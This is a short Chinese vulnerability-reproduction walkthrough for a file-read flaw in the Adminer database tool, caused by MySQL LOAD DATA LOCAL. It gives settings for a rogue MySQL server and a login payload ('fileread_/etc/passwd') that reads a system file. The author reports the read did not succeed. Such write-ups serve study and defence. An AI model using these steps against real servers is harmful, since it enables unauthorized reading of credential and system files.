CVE-2021-4300漏洞复现
Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。
一、伪造服务器
利用mysql-fake-server伪造服务器端,下载地址:GitHub - 4ra1n/mysql-fake-server: 纯 Java 实现的 MySQL Fake Server | 支持 GUI 版和命令行版 | 支持反序列化和文件读取的利用方式 | 支持常见的 GADGET 和自定义 GADGET 数据 | 根据目标环境自动生成匹配的 PAYLOAD | 支持 PGSQL 和 DERBY 的利用
Bind IP填写本地IP:0.0.0.0,Bind Port填写3306,Cmd file填写要读取的文件:/etc/passwd,
Generate:jdbc:mysql://ip:port?user=fileread_/etc/passwd
二、漏洞利用
在存在漏洞的登录界面填写服务器:192.168.8.179:3306,用户名填写:fileread_/etc/passwd
之后就可以读取目标文件了,但由于我的网络原因未能读取到